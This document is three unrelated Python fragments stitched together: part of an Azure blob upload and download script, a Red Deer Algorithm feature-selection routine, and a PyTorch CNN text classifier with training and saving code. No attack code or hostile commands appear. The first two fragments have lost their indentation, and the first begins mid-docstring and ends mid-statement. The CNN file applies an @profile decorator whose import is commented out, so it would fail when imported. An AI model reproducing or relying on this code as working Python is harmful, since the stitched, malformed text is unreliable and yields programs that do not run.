Parameters:
None
Returns:
Nothing
Raises:
ValueError for invalid arguments
"""
# get command-line args
args = parseargs()
# check some parameters
if len(args.localresource) < 1 or len(args.storageaccount) < 1 or \
len(args.container) < 1:
raise ValueError('invalid positional arguments')
if len(args.blobep) < 1:
raise ValueError('blob endpoint is invalid')
if args.upload and args.download:
raise ValueError('cannot force transfer direction of download '
'and upload in the same command')
if args.storageaccountkey is not None and args.saskey is not None:
raise ValueError('cannot use both a sas key and storage account key')
if args.pageblob and args.autovhd:
raise ValueError('cannot specify both pageblob and autovhd parameters')
if args.keeprootdir and args.collate is not None:
raise ValueError('cannot specify both keeprootdir and collate path')
if args.timeout is not None and args.timeout <= 0:
args.timeout = None
# get key if we don't have a handle on one
sms = None
if args.saskey is not None:
if len(args.saskey) < 1:
raise ValueError('invalid sas key specified')
elif args.storageaccountkey is None:
if args.managementcert is not None and \
args.subscriptionid is not None:
# check to ensure management cert is valid
if len(args.managementcert) == 0 or \
args.managementcert.split('.')[-1].lower() != 'pem':
raise ValueError('management cert appears to be invalid')
if args.managementep is None or len(args.managementep) == 0:
raise ValueError('management endpoint is invalid')
# expand management cert path out if contains ~
args.managementcert = os.path.abspath(args.managementcert)
# get sms reference
sms = azure.servicemanagement.ServiceManagementService(
args.subscriptionid, args.managementcert, args.managementep)
# get keys
service_keys = azure_request(
sms.get_storage_account_keys, timeout=args.timeout,
service_name=args.storageaccount)
args.storageaccountkey = service_keys.storage_service_keys.primary
else:
raise ValueError('management cert/subscription id not '
'specified without storage account key')
# check storage account key validity
if args.storageaccountkey is not None and \
len(args.storageaccountkey) < 1:
raise ValueError('storage account key is invalid')
# set valid num workers
if args.numworkers < 1:
args.numworkers = 1
# expand any paths
args.localresource = os.path.expanduser(args.localresource)
# sanitize remote file name
if args.remoteresource:
args.remoteresource = args.remoteresource.strip(os.path.sep)
# set chunk size
if args.chunksizebytes is None or args.chunksizebytes < 64:
args.chunksizebytes = _MAX_BLOB_CHUNK_SIZE_BYTES
# set blob ep
blobep = None
if sms:
storage_acct = azure_request(
sms.get_storage_account_properties, timeout=args.timeout,
service_name=args.storageaccount)
blobep = storage_acct.storage_service_properties.endpoints[0]
else:
blobep = 'https://{}.{}/'.format(args.storageaccount, args.blobep)
# create master blob service
blob_service = None
if args.storageaccountkey:
if args.blobep[0] == '.':
host_base = args.blobep
else:
host_base = '.' + args.blobep
if args.timeout is None:
blob_service = azure.storage.blob.BlobService(
account_name=args.storageaccount,
account_key=args.storageaccountkey,
host_base=host_base)
else:
blob_service = azure.storage.blob.BlobService(
account_name=args.storageaccount,
account_key=args.storageaccountkey,
host_base=host_base, timeout=args.timeout)
elif args.saskey:
blob_service = SasBlobService(blobep, args.saskey, args.timeout)
# disable container creation (not possible with SAS)
args.createcontainer = False
if blob_service is None:
raise ValueError('blob_service is invalid')
# check which way we're transfering
xfertoazure = False
if args.upload or (not args.download and
os.path.exists(args.localresource)):
xfertoazure = True
else:
if args.remoteresource is None:
raise ValueError('cannot download remote file if not specified')
# print all parameters
print('======================================')
print(' azure blobxfer parameters [v{}]'.format(_SCRIPT_VERSION))
print('======================================')
print(' subscription id: {}'.format(args.subscriptionid))
print(' management cert: {}'.format(args.managementcert))
print(' transfer direction: {}'.format(
'local->Azure' if xfertoazure else 'Azure->local'))
print(' local resource: {}'.format(args.localresource))
print(' remote resource: {}'.format(args.remoteresource))
print(' max num of workers: {}'.format(args.numworkers))
print(' timeout: {}'.format(args.timeout))
print(' storage account: {}'.format(args.storageaccount))
print(' use SAS: {}'.format(True if args.saskey else False))
print(' upload as page blob: {}'.format(args.pageblob))
print(' auto vhd->page blob: {}'.format(args.autovhd))
print(' container: {}'.format(args.container))
print(' blob container URI: {}'.format(blobep + args.container))
print(' compute file MD5: {}'.format(args.computefilemd5))
print(' skip on MD5 match: {}'.format(args.skiponmatch))
print(' chunk size (bytes): {}'.format(args.chunksizebytes))
print(' create container: {}'.format(args.createcontainer))
print(' keep mismatched MD5: {}'.format(args.keepmismatchedmd5files))
print(' recursive if dir: {}'.format(args.recursive))
print(' keep root dir on up: {}'.format(args.keeprootdir))
print(' collate to: {}'.format(
args.collate if args.collate is not None else 'disabled'))
print('=======================================\n')
# mark start time after init
print('script start time: {}'.format(time.strftime("%Y-%m-%d %H:%M:%S")))
start = time.time()
# populate instruction queues
allfilesize = 0
storage_in_queue = queue.Queue()
nstorageops = 0
blockids = {}
completed_blockids = {}
filemap = {}
filesizes = {}
md5map = {}
filedesc = None
if xfertoazure:
# if skiponmatch is enabled, list blobs first and check
if args.skiponmatch:
blobskipdict = get_blob_listing(blob_service, args)
else:
blobskipdict = {}
if os.path.isdir(args.localresource):
# mirror directory
if args.recursive:
for root, _, files in | |
"""
Programmer: <NAME>
Date of Development: 14/10/2020
This code has been developed according to the procedures mentioned in the following research article:
"Fathollahi-Fard, <NAME>, <NAME>, and <NAME>.
'Red deer algorithm (RDA): a new nature-inspired meta-heuristic.''" Soft Computing (2020): 1-29."
"""
import numpy as np
import time
import matplotlib.pyplot as plt
import random, math
import sys
from sklearn.model_selection import train_test_split
from sklearn import datasets
from Py_FS.wrapper.nature_inspired._utilities import Solution, Data, initialize, sort_agents, display, compute_fitness, Conv_plot
from Py_FS.wrapper.nature_inspired._transfer_functions import get_trans_function
# from _utilities import Solution, Data, initialize, sort_agents, display, compute_fitness, Conv_plot
# from _transfer_functions import get_trans_function
def RDA(num_agents, max_iter, train_data, train_label, obj_function=compute_fitness, trans_function_shape='s', save_conv_graph=False):
# Red Deer Algorithm
############################### Parameters ####################################
# #
# num_agents: number of red deers #
# max_iter: maximum number of generations #
# train_data: training samples of data #
# train_label: class labels for the training samples #
# obj_function: the function to maximize while doing feature selection #
# trans_function_shape: shape of the transfer function used #
# save_conv_graph: boolean value for saving convergence graph #
# #
###############################################################################
# Number of agents must be at least 8
if num_agents < 8:
print("[Error!] The value of the parameter num_agents must be at least 8", file=sys.stderr)
sys.exit(1)
short_name = 'RDA'
agent_name = 'RedDeer'
train_data, train_label = np.array(train_data), np.array(train_label)
num_features = train_data.shape[1]
trans_function = get_trans_function(trans_function_shape)
# setting up the objectives
weight_acc = None
if(obj_function==compute_fitness):
weight_acc = float(input('Weight for the classification accuracy [0-1]: '))
obj = (obj_function, weight_acc)
compute_accuracy = (compute_fitness, 1) # compute_accuracy is just compute_fitness with accuracy weight as 1
# initialize red deers and Leader (the agent with the max fitness)
deer = initialize(num_agents, num_features)
fitness = np.zeros(num_agents)
accuracy = np.zeros(num_agents)
Leader_agent = np.zeros((1, num_features))
Leader_fitness = float("-inf")
Leader_accuracy = float("-inf")
# initialize convergence curves
convergence_curve = {}
convergence_curve['fitness'] = np.zeros(max_iter)
# initialize data class
data = Data()
val_size = float(input('Enter the percentage of data wanted for valdiation [0, 100]: '))/100
data.train_X, data.val_X, data.train_Y, data.val_Y = train_test_split(train_data, train_label, stratify=train_label, test_size=val_size)
# create a solution object
solution = Solution()
solution.num_agents = num_agents
solution.max_iter = max_iter
solution.num_features = num_features
solution.obj_function = obj_function
# initializing parameters
UB = 5 # Upper bound
LB = -5 # Lower bound
gamma = 0.5 # Fraction of total number of males who are chosen as commanders
alpha = 0.2 # Fraction of total number of hinds in a harem who mate with the commander of their harem
beta = 0.1 # Fraction of total number of hinds in a harem who mate with the commander of a different harem
# start timer
start_time = time.time()
# main loop
for iter_no in range(max_iter):
print('\n================================================================================')
print(' Iteration - {}'.format(iter_no+1))
print('================================================================================\n')
deer, fitness = sort_agents(deer, obj, data)
num_males = int(0.25 * num_agents)
num_hinds = num_agents - num_males
males = deer[:num_males,:]
hinds = deer[num_males:,:]
# roaring of male deer
for i in range(num_males):
r1 = np.random.random() # r1 is a random number in [0, 1]
r2 = np.random.random() # r2 is a random number in [0, 1]
r3 = np.random.random() # r3 is a random number in [0, 1]
new_male = males[i].copy()
if r3 >= 0.5: # Eq. (3)
new_male += r1 * (((UB - LB) * r2) + LB)
else:
new_male -= r1 * (((UB - LB) * r2) + LB)
# apply transformation function on the new male
for j in range(num_features):
trans_value = trans_function(new_male[j])
if (np.random.random() < trans_value):
new_male[j] = 1
else:
new_male[j] = 0
if obj_function(new_male, data.train_X, data.val_X, data.train_Y, data.val_Y) < obj_function(males[i], data.train_X, data.val_X, data.train_Y, data.val_Y):
males[i] = new_male
# selection of male commanders and stags
num_coms = int(num_males * gamma) # Eq. (4)
num_stags = num_males - num_coms # Eq. (5)
coms = males[:num_coms,:]
stags = males[num_coms:,:]
# fight between male commanders and stags
for i in range(num_coms):
chosen_com = coms[i].copy()
chosen_stag = random.choice(stags)
r1 = np.random.random()
r2 = np.random.random()
new_male_1 = (chosen_com + chosen_stag) / 2 + r1 * (((UB - LB) * r2) + LB) # Eq. (6)
new_male_2 = (chosen_com + chosen_stag) / 2 - r1 * (((UB - LB) * r2) + LB) # Eq. (7)
# apply transformation function on new_male_1
for j in range(num_features):
trans_value = trans_function(new_male_1[j])
if (np.random.random() < trans_value):
new_male_1[j] = 1
else:
new_male_1[j] = 0
# apply transformation function on new_male_2
for j in range(num_features):
trans_value = trans_function(new_male_2[j])
if (np.random.random() < trans_value):
new_male_2[j] = 1
else:
new_male_2[j] = 0
fitness = np.zeros(4)
fitness[0] = obj_function(chosen_com, data.train_X, data.val_X, data.train_Y, data.val_Y)
fitness[1] = obj_function(chosen_stag, data.train_X, data.val_X, data.train_Y, data.val_Y)
fitness[2] = obj_function(new_male_1, data.train_X, data.val_X, data.train_Y, data.val_Y)
fitness[3] = obj_function(new_male_2, data.train_X, data.val_X, data.train_Y, data.val_Y)
bestfit = np.max(fitness)
if fitness[0] < fitness[1] and fitness[1] == bestfit:
coms[i] = chosen_stag.copy()
elif fitness[0] < fitness[2] and fitness[2] == bestfit:
coms[i] = new_male_1.copy()
elif fitness[0] < fitness[3] and fitness[3] == bestfit:
coms[i] = new_male_2.copy()
# formation of harems
coms, fitness = sort_agents(coms, obj, data)
norm = np.linalg.norm(fitness)
normal_fit = fitness / norm
total = np.sum(normal_fit)
power = normal_fit / total # Eq. (9)
num_harems = [int(x * num_hinds) for x in power] # Eq.(10)
max_harem_size = np.max(num_harems)
harem = np.empty(shape=(num_coms, max_harem_size, num_features))
random.shuffle(hinds)
itr = 0
for i in range(num_coms):
harem_size = num_harems[i]
for j in range(harem_size):
harem[i][j] = hinds[itr]
itr += 1
# mating of commander with hinds in his harem
num_harem_mate = [int(x * alpha) for x in num_harems] # Eq. (11)
population_pool = list(deer)
for i in range(num_coms):
random.shuffle(harem[i])
for j in range(num_harem_mate[i]):
r = np.random.random() # r is a random number in [0, 1]
offspring = (coms[i] + harem[i][j]) / 2 + (UB - LB) * r # Eq. (12)
# apply transformation function on offspring
for j in range(num_features):
trans_value = trans_function(offspring[j])
if (np.random.random() < trans_value):
offspring[j] = 1
else:
offspring[j] = 0
population_pool.append(list(offspring))
# if number of commanders is greater than 1, inter-harem mating takes place
if num_coms > 1:
# mating of commander with hinds in another harem
k = i
while k == i:
k = random.choice(range(num_coms))
num_mate = int(num_harems[k] * beta) # Eq. (13)
np.random.shuffle(harem[k])
for j in range(num_mate):
r = np.random.random() # r is a random number in [0, 1]
offspring = (coms[i] + harem[k][j]) / 2 + (UB - LB) * r
# apply transformation function on offspring
for j in range(num_features):
trans_value = trans_function(offspring[j])
if (np.random.random() < trans_value):
offspring[j] = 1
else:
offspring[j] = 0
population_pool.append(list(offspring))
# mating of stag with nearest hind
for stag in stags:
dist = np.zeros(num_hinds)
for i in range(num_hinds):
dist[i] = math.sqrt(np.sum((stag-hinds[i])*(stag-hinds[i])))
min_dist = np.min(dist)
for i in range(num_hinds):
distance = math.sqrt(np.sum((stag-hinds[i])*(stag-hinds[i]))) # Eq. (14)
if(distance == min_dist):
r = np.random.random() # r is a random number in [0, 1]
offspring = (stag + hinds[i])/2 + (UB - LB) * r
# apply transformation function on offspring
for j in range(num_features):
trans_value = trans_function(offspring[j])
if (np.random.random() < trans_value):
offspring[j] = 1
else:
offspring[j] = 0
population_pool.append(list(offspring))
break
# selection of the next generation
population_pool = np.array(population_pool)
population_pool, fitness = sort_agents(population_pool, obj, data)
maximum = sum([f for f in fitness])
selection_probs = [f/maximum for f in fitness]
indices = np.random.choice(len(population_pool), size=num_agents, replace=True, p=selection_probs)
deer = population_pool[indices]
# update final information
deer, fitness = sort_agents(deer, obj, data)
display(deer, fitness, agent_name)
if fitness[0] > Leader_fitness:
Leader_agent = deer[0].copy()
Leader_fitness = fitness[0].copy()
convergence_curve['fitness'][iter_no] = np.mean(fitness)
# compute final accuracy
Leader_agent, Leader_accuracy = sort_agents(Leader_agent, compute_accuracy, data)
deer, accuracy = sort_agents(deer, compute_accuracy, data)
print('\n================================================================================')
print(' Final Result ')
print('================================================================================\n')
print('Leader ' + agent_name + ' Dimension : {}'.format(int(np.sum(Leader_agent))))
print('Leader ' + agent_name + ' Fitness : {}'.format(Leader_fitness))
print('Leader ' + agent_name + ' Classification Accuracy : {}'.format(Leader_accuracy))
print('\n================================================================================\n')
# stop timer
end_time = time.time()
exec_time = end_time - start_time
# plot convergence graph
fig, axes = Conv_plot(convergence_curve)
if(save_conv_graph):
plt.savefig('convergence_graph_'+ short_name + '.jpg')
| |
<reponame>preduct0r/mixup-text
import logging
import math
import os
from operator import itemgetter
import sys
from typing import List, Tuple, Iterator, Optional
# from . import optimize
from .classifier import Classifier, AlgorithmProps
from .utils import calculate_confidence_threshold
sys.path.append('..')
from classifier_trainer.app.exceptions import NotIntegerException, ThresholdCouldNotCountException
from classifier_trainer.app.settings import BASE_DIR
from common import custom_types
from common.utils import flatten, reverse_flatten
import torch
from torch.utils.data import DataLoader, Dataset, WeightedRandomSampler
from torch.nn import Sequential
from torch.nn import functional as F
from torch import nn
import torch.cuda as cuda
import gensim
import numpy as np
import pandas as pd
from copy import deepcopy
import random
import time
from sklearn.metrics import f1_score, accuracy_score, classification_report, confusion_matrix, recall_score
# from memory_profiler import profile
def set_seed(seed):
    """Seed every RNG in use (hash, python, numpy, torch/CUDA) and force
    deterministic cuDNN so training runs are reproducible."""
    os.environ['PYTHONHASHSEED'] = str(seed)
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed(seed)
    # Deterministic convolution algorithms, no autotuning.
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
# Fix every RNG at import time so all training runs are reproducible.
set_seed(43)

logger = logging.getLogger(__name__)

# from sampler import BalancedBatchSampler
class CNNProps(AlgorithmProps):
    """Declarative configuration schema for the CNN classifier.

    Each descriptor maps to a key of the (flattened) config; the declared
    `default` is used when the key is absent.  `Meta.fields` enumerates
    every accepted key.
    """
    model__embeddings = custom_types.String()    # path to pretrained embedding vectors
    model__vocabulary = custom_types.String()    # path to the vocabulary file
    model__embeddings_dim = custom_types.Integer(default=100)
    model__filter_sizes = custom_types.Collection(list, default=(1, 1, 1, 2, 2, 2))  # conv kernel heights
    model__num_filters = custom_types.Integer(default=128)  # feature maps per kernel size
    # NOTE(review): stored as a *keep* probability (TF convention) -- see
    # how it is consumed before passing it to nn.Dropout.
    model__dropout_keep_prob = custom_types.Float(default=0.8)
    model__l2_reg_lambda = custom_types.Float(default=0.0)
    model__learning_rate = custom_types.Float(default=2e-3)
    model__batch_size = custom_types.Integer(default=64)
    model__evaluate_every = custom_types.Integer(default=300)  # -1 = derive from dataset size
    model__max_len = custom_types.Integer(default=64)  # tokens per sample
    model__max_epoch_num = custom_types.Integer(default=10)
    model__label_smoothing = custom_types.Boolean(default=True)
    optimization__save_ckpt = custom_types.Boolean(default=True)
    optimization__freeze_graph = custom_types.Boolean(default=True)
    optimization__quantize_weights = custom_types.Boolean(default=False)

    def to_internal_value(self, config):
        # Config arrives nested; descriptors are addressed by the flat
        # "section__key" naming, hence the flatten.
        return flatten(config)

    def to_external_value(self, data):
        # Export only the architecture-defining subset, re-nested.
        return reverse_flatten({
            "algorithm": "CNN",
            "model__embeddings_dim": data.get("model__embeddings_dim"),
            "model__filter_sizes": data.get("model__filter_sizes"),
            "model__num_filters": data.get("model__num_filters"),
            "model__l2_reg_lambda": data.get("model__l2_reg_lambda"),
            "model__max_len": data.get("model__max_len"),
            "threshold__confidence_threshold": data.get("threshold__confidence_threshold"),
        })

    class Meta:
        # Complete list of config keys this schema accepts.
        fields = [
            "model__embeddings",
            "model__vocabulary",
            "model__embeddings_dim",
            "model__filter_sizes",
            "model__num_filters",
            "model__dropout_keep_prob",
            "model__l2_reg_lambda",
            "model__learning_rate",
            "model__batch_size",
            "model__evaluate_every",
            "model__max_len",
            "model__max_epoch_num",
            "threshold__confidence_threshold",
            "optimization__save_ckpt",
            "optimization__freeze_graph",
            "optimization__quantize_weights"
        ]
def create_emb_layer(embeddings, non_trainable=False):
    """Build an nn.Embedding initialized from a pretrained weight matrix.

    Parameters:
        embeddings: 2-D array-like (vocab_size x dim) of pretrained vectors.
        non_trainable: when True the embedding weights are frozen.
    Returns:
        the initialized nn.Embedding layer.
    """
    layer = nn.Embedding.from_pretrained(torch.FloatTensor(embeddings))
    # from_pretrained freezes by default; honour the caller's choice.
    if non_trainable:
        layer.weight.requires_grad = False
    else:
        layer.weight.requires_grad = True
    return layer
class My_Dataset(Dataset):
    """Minimal in-memory Dataset pairing 2-D feature rows with label rows."""

    def __init__(self, x, y):
        self.x = x  # 2-D array, one row of token ids per sample
        self.y = y  # 2-D array, one row of label values per sample

    def __len__(self):
        return len(self.y)

    def __getitem__(self, idx):
        sample = torch.LongTensor(self.x[idx, :])
        label = torch.FloatTensor(self.y[idx, :])
        return sample, label
class CNN(nn.Module):
def __init__(self, conf_file=None):
    """Kim-style text CNN: parallel Conv2d branches of different kernel
    heights over an embedding matrix, max-pooled and concatenated.

    Parameters:
        conf_file - path to the YAML config; defaults to
                    <BASE_DIR>/engine/setting/cnn.yaml.
    Raises:
        ValueError when both save_ckpt and freeze_graph are disabled.
    """
    super(CNN, self).__init__()
    if conf_file is None:
        conf_file = os.path.join(BASE_DIR, "engine", "setting", "cnn.yaml")
    self.properties = CNNProps(
        path=conf_file
    )
    # Filled in later by validate()/fit() and training.
    self.labels = []
    self.vocabulary = []
    self.embeddings = None
    self.sess = None
    self.train_optimizer = None
    self.global_step = None
    self.best_step = None
    self.loss = None
    self.accuracy = None
    self.epoch = None
    self.input_x = None
    self.input_y = None
    self.dropout_keep_prob = None
    self.weight_dacay = 1e-4
    self.embeddings, self.vocabulary = self._init_embeddings_and_vocab(self.properties.model__embeddings,
                                                                       self.properties.model__vocabulary,
                                                                       self.properties.model__embeddings_dim)
    # Real dimensionality comes from the loaded matrix, not the config.
    self.properties.model__embeddings_dim = np.shape(self.embeddings)[1]
    if not (self.properties.optimization__save_ckpt
            or self.properties.optimization__freeze_graph):
        message = "'save_ckpt', 'freeze' and 'quantize_weights' parameters are False. Please check {}"\
            .format(conf_file)
        logger.error(message)
        raise ValueError(message)
    # Tensorflow and PyTorch typically order their batches of images
    # (TF: NHWC, PyTorch: NCHW) and weights (TF: HWCiCo, PyTorch CoCiHW)
    self.convs = nn.ModuleList([nn.Conv2d(in_channels=1, out_channels=self.properties.model__num_filters,
                                          kernel_size=(k, self.properties.model__embeddings_dim), bias=True) for k in self.properties.model__filter_sizes])
    # probing the effect of weight initialization on the result
    for conv in self.convs:
        torch.nn.init.trunc_normal_(conv.weight, std=0.1)
    # BUG FIX: the config stores a *keep* probability (TF convention,
    # default 0.8), but nn.Dropout's `p` is the probability of *zeroing*
    # an element.  Passing it through unchanged dropped 80% of the
    # activations; convert keep-prob to drop-prob instead.
    self.dropout = nn.Dropout(p=1.0 - self.properties.model__dropout_keep_prob)
def forward(self, x, hidden=None):
    """Run the conv -> max-pool -> concat -> linear pipeline over a batch
    of token-id sequences; `hidden` is accepted but unused."""
    embedded = self.emb_layer(x)
    # Add a trailing channel dim, then reorder to the NCHW layout Conv2d
    # expects (batch, 1, seq_len, emb_dim).
    embedded = torch.unsqueeze(embedded, -1).permute(0, 3, 1, 2)
    feature_maps = [F.relu(conv(embedded)) for conv in self.convs]
    # Pool each branch over the full remaining sequence length.
    pooled = [
        F.max_pool2d(input=fmap,
                     kernel_size=(self.properties.model__max_len - width + 1, 1))
        for width, fmap in zip(self.properties.model__filter_sizes, feature_maps)
    ]
    features = torch.squeeze(self.dropout(torch.cat(pooled, dim=1)))
    return self.linear(features)
# @profile
def validate(self, data) -> Tuple[float, int]:
    """Train on the train split of `data`, evaluating on its test split.

    Parameters:
        data - project dataset object exposing return_unique_labels(),
               get_train_part() and get_test_part()
    Returns:
        (accuracy, best_step) from _train_classifier_with_test; best_step
        is also stored on self for a later fit() run.
    """
    self.labels = data.return_unique_labels()
    # create the linear layer only now, once the number of classes is known
    # NOTE(review): in_features=768 equals the default num_filters (128)
    # times the number of filter sizes (6); it breaks if the config changes
    # either value -- confirm.
    self.linear = nn.Linear(in_features=768, out_features=len(self.labels))
    # probing the effect of weight initialization on the result
    torch.nn.init.trunc_normal_(self.linear.weight, std=0.1)
    training_samples, target_labels = data.get_train_part()
    test_samples, target_test_labels = data.get_test_part()
    # -1 means "auto": derive the evaluation interval from the dataset size
    if self.properties.model__evaluate_every == -1:
        self.properties.model__evaluate_every = max(1, int(len(target_labels) / 50))
    self._add_unknown_words_to_model(training_samples)
    # create emb_layer only after every word was added to the vocabulary
    self.emb_layer = create_emb_layer(self.embeddings, False)
    # digitize: words -> indices, labels -> vectors
    training_samples = self._digitize_sents(training_samples)
    target_labels = self._digitize_labels(target_labels)
    test_samples = self._digitize_sents(test_samples)
    target_test_labels = self._digitize_labels(target_test_labels)
    accuracy, self.best_step = self._train_classifier_with_test(
        training_samples, test_samples, target_labels, target_test_labels
    )
    return accuracy, self.best_step
def fit(self, data):
    """Train on the full dataset, then derive the confidence threshold.

    Parameters:
        data - project dataset object exposing return_unique_labels(),
               get_data(), get_count_avg_examples(), get_count_classes()
    Raises:
        ThresholdCouldNotCountException when the confidence threshold
        cannot be computed.
    """
    self.labels = data.return_unique_labels()
    # create the linear layer only now, once the number of classes is known
    # NOTE(review): 768 == default num_filters (128) * number of filter
    # sizes (6); hard-coded -- confirm it tracks the config.
    self.linear = nn.Linear(in_features=768, out_features=len(self.labels))
    # probing the effect of weight initialization on the result
    torch.nn.init.trunc_normal_(self.linear.weight, std=0.1)
    training_samples, target_labels = data.get_data()
    # -1 means "auto": derive the evaluation interval from the dataset size
    if self.properties.model__evaluate_every == -1:
        self.properties.model__evaluate_every = max(1, int(len(target_labels) / 50))
    self._add_unknown_words_to_model(training_samples)
    # create emb_layer only after every word was added to the vocabulary
    self.emb_layer = create_emb_layer(self.embeddings, False)
    training_samples = self._digitize_sents(training_samples)
    target_labels = self._digitize_labels(target_labels)
    self._train_classifier(training_samples, target_labels)
    try:
        self.properties.threshold__confidence_threshold = \
            calculate_confidence_threshold(self.properties, data.get_count_avg_examples(),
                                           data.get_count_classes())
    except NotIntegerException as e:
        # surface as the domain-specific failure the callers expect
        logger.error(str(e))
        raise ThresholdCouldNotCountException(str(e))
def save(self, model_path: Optional[str] = None):
    """Persist the trained model plus its labels and vocabulary.

    Parameters:
        model_path - target directory; defaults to ./torch_cnn_model.
    Writes into <model_path>/torch_folder/: only_state_dict.pt,
    second_option.pt, cnn_labels.txt, cnn_vocab.txt.
    """
    logger.info("Saving Pytorch CNN started")
    if model_path is None:
        model_path = os.path.abspath("torch_cnn_model")
    try:
        os.makedirs(model_path)
    except FileExistsError:
        logger.warning("SaveModel directory {} already exists"
                       .format(model_path))
    checkpoint_dir = os.path.join(model_path, "torch_folder")
    ckpt_filepath = os.path.join(checkpoint_dir, "torch_cnn.pt")
    try:
        os.makedirs(checkpoint_dir)
    except FileExistsError:
        logger.warning("Checkpoint directory {} already exists"
                       .format(checkpoint_dir))
    # Option 1: full training checkpoint (kept for reference)
    # torch.save({
    #     'epoch': self.epoch,
    #     'model_state_dict': self.state_dict(),
    #     'optimizer_state_dict': self.optimizer.state_dict(),
    #     'loss': self.loss,
    # }, ckpt_filepath)
    # Option 2: weights only
    torch.save(self.state_dict(), os.path.join(checkpoint_dir, 'only_state_dict.pt'))
    # TODO check whether this option is better
    # Option 3: pickle the entire module object
    torch.save(self, os.path.join(checkpoint_dir, 'second_option.pt'))
    # NOTE(review): nothing is actually written to ckpt_filepath (Option 1
    # is commented out) -- the log message below is misleading; confirm.
    logger.info("Saved Pytorch CNN model checkpoint to {}".format(ckpt_filepath))
    with open(
        os.path.join(checkpoint_dir, "cnn_labels.txt"), "w", encoding="utf-8"
    ) as file_out:
        file_out.write("\n".join(self.labels))
    with open(
        os.path.join(checkpoint_dir, "cnn_vocab.txt"), "w", encoding="utf-8"
    ) as file_out:
        logger.info("Sorting {} words...".format(len(self.vocabulary)))
        # presumably vocabulary maps word -> index; words are written in
        # index order -- confirm against _init_embeddings_and_vocab
        sorted_vocabulary = [
            kv[0] for kv in sorted(self.vocabulary.items(), key=itemgetter(1))
        ]
        logger.info("Saving sorted vocabulary...")
        file_out.write("\n".join(sorted_vocabulary))
    logger.info("Saving Pytorch CNN ended")
def _train_classifier(self, training_samples: np.ndarray, target_labels: np.ndarray):
    """Train the network for up to ``model__max_epoch_num`` epochs,
    stopping once ``self.best_step`` iterations have been performed
    (the best step found earlier by ``_train_classifier_with_test``).

    Args:
        training_samples: digitized training sentences.
        target_labels: one-hot target labels (argmax taken per batch).
    """
    logger.info("Training PyTorch_CNN......")
    # NOTE(review): the original computed a CUDA device and then
    # unconditionally overrode it with 'cpu', so training was always on
    # CPU; the dead branch is removed here — confirm whether GPU
    # training was intended.
    device = 'cpu'
    self.to(device)
    batcher_train = DataLoader(My_Dataset(training_samples, target_labels),
                               batch_size=self.properties.model__batch_size, shuffle=False)
    criterion = torch.nn.CrossEntropyLoss()
    self.optimizer = torch.optim.Adam(self.parameters(),
                                      lr=self.properties.model__learning_rate,
                                      weight_decay=self.weight_dacay)
    iteration = 0
    reached_best_step = False
    for epoch in range(self.properties.model__max_epoch_num):
        self.epoch = epoch
        for i, (samples, labels) in enumerate(batcher_train):
            self.train()
            # Skip the trailing partial batch.
            if labels.shape[0] != self.properties.model__batch_size:
                break
            samples = samples.to(device)
            labels = labels.to(device)
            self.optimizer.zero_grad()
            outputs = self(samples)
            self.loss = criterion(outputs, torch.argmax(labels, 1, keepdim=False))
            self.loss.backward()
            self.optimizer.step()
            _, predicted = torch.max(outputs.data, 1)
            torch.cuda.empty_cache()
            iteration += 1
            if iteration == self.best_step:
                # Bug fix: previously only the batch loop was broken, so
                # the remaining epochs kept training past best_step.
                reached_best_step = True
                break
        if reached_best_step:
            break
    logger.info("Finished training CNN")
@profile
def _train_classifier_with_test(
    self,
    training_samples: np.ndarray,
    test_samples: np.ndarray,
    target_labels: np.ndarray,
    target_test_labels: np.ndarray,
) -> Tuple[float, int]:
    """Train the network, evaluating on the test split every
    ``model__evaluate_every`` iterations.

    Returns:
        Tuple ``(best test accuracy, iteration it was reached at)``;
        the iteration is ``-1`` when evaluation never improved on 0.0.
    """
    logger.info('num_classes {}'.format(len(self.labels)))
    print('num_classes {}'.format(len(self.labels)))
    logger.info("Training PyTorch_CNN...")
    max_acc_dev = 0.0
    best_step_dev = -1
    if torch.cuda.is_available():
        # Tell PyTorch to use the GPU.
        device = torch.device("cuda")
        print('There are %d GPU(s) available.' % torch.cuda.device_count())
    else:
        print('No GPU available, using the CPU instead.')
        device = torch.device("cpu")
    if device == torch.device("cuda"):
        print('We will use the GPU:', torch.cuda.get_device_name(0))
    else:
        print('We will use CPU')
    self.to(device)
    # shuffle=False for reproducibility of results.
    batcher_train = DataLoader(My_Dataset(training_samples, target_labels),
                               batch_size=self.properties.model__batch_size, shuffle=False)
    batcher_val = DataLoader(My_Dataset(test_samples, target_test_labels),
                             batch_size=self.properties.model__batch_size, shuffle=False)
    criterion = torch.nn.CrossEntropyLoss()
    self.optimizer = torch.optim.Adam(self.parameters(),
                                      lr=self.properties.model__learning_rate,
                                      weight_decay=self.weight_dacay)
    iteration = 0
    for epoch in range(self.properties.model__max_epoch_num):
        for i, (samples, labels) in enumerate(batcher_train):
            self.train()
            # Skip the trailing partial batch.
            if labels.shape[0] != self.properties.model__batch_size:
                break
            samples = samples.to(device)
            labels = labels.to(device)
            self.optimizer.zero_grad()
            outputs = self(samples)
            self.loss = criterion(outputs, torch.argmax(labels, 1, keepdim=False))
            self.loss.backward()
            self.optimizer.step()
            _, predicted = torch.max(outputs.data, 1)
            torch.cuda.empty_cache()
            iteration += 1
            if iteration % self.properties.model__evaluate_every == 0:
                loss = 0.0
                accuracy = 0.0
                self.eval()
                # Bug fix: run evaluation under no_grad so it does not
                # build the autograd graph or retain activations.
                with torch.no_grad():
                    for j, (samples, labels) in enumerate(batcher_val):
                        # NOTE(review): the trailing partial test batch is
                        # skipped, so the per-sample weights below may sum
                        # to less than 1 — confirm this is intended.
                        if labels.shape[0] != self.properties.model__batch_size:
                            break
                        samples = samples.to(device)
                        labels = labels.to(device)
                        outputs = self(samples)
                        # .item() accumulates a python float instead of a
                        # tensor that would keep device memory referenced.
                        loss += criterion(outputs, torch.argmax(labels, 1, keepdim=False)).item() * \
                            samples.shape[0] / float(test_samples.shape[0])
                        _, predicted = torch.max(outputs.data, 1)
                        accuracy += accuracy_score(predicted.cpu().numpy(),
                                                   np.argmax(labels.data.cpu().numpy(), axis=1)) * \
                            samples.shape[0] / float(test_samples.shape[0])
                if accuracy > max_acc_dev:
                    max_acc_dev = accuracy
                    best_step_dev = iteration
                print('iter: {}, loss: {}, accuracy: {}'.format(iteration, loss, accuracy))
    logger.info("Finished training PyTorch_CNN, test accuracy={:.2f}"
                .format(max_acc_dev))
    return max_acc_dev, best_step_dev
